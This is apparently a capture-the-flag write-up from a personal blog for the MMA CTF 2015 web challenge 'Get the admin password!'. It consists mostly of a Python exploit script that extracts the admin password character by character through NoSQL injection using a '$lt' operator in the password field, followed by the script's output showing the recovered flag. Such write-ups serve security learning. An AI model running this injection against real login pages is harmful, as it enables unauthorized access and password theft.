shpik's world!

[Web] Get the admin password! - 100pts

0x400 CTF/0x401 MMA 1st 2015



This Problem is very Simple NoSQL injection.



# exploit.py
import urllib2
import urllib
URL = "http://gap.chal.ctf.westerns.tokyo/login.php"

result = ""
for i in range(100):
	for j in range(0x20,0x90):
		data = {'user' : 'admin', 'password[$lt]' : result+chr(j)}
		data = urllib.urlencode(data)
		req = urllib2.Request(URL,data)
		res = urllib2.urlopen(req)
		if res.read().find("Wrong user name or password")>10:
			continue
		else:
			result += chr(j-1)
			print result
			break
'''
shpik@shpik:/ctf/MMA/web/gap$ python exploit.py 
T
TW
TWC
TWCT
TWCTF
TWCTF{
TWCTF{w
TWCTF{wa
TWCTF{was
TWCTF{wass
TWCTF{wassh
TWCTF{wassho
TWCTF{wasshoi
TWCTF{wasshoi!
TWCTF{wasshoi!s
TWCTF{wasshoi!su
TWCTF{wasshoi!sum
TWCTF{wasshoi!summ
TWCTF{wasshoi!summe
TWCTF{wasshoi!summer
TWCTF{wasshoi!summer_
TWCTF{wasshoi!summer_f
TWCTF{wasshoi!summer_fe
TWCTF{wasshoi!summer_fes
TWCTF{wasshoi!summer_fest
TWCTF{wasshoi!summer_festi
TWCTF{wasshoi!summer_festiv
TWCTF{wasshoi!summer_festiva
TWCTF{wasshoi!summer_festival
TWCTF{wasshoi!summer_festival!
TWCTF{wasshoi!summer_festival!}
'''


'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글

[Crypto] Twin Prime - 50pts  (0) 2016.09.05
[Web] Global Page - 50pts  (0) 2016.09.05
[Web] Get the admin password! - 100pts  (0) 2016.09.05
[Web] Mortal Magi Agents - 300pts  (0) 2015.09.09
[Web] Login as admin! - 30pts  (0) 2015.09.08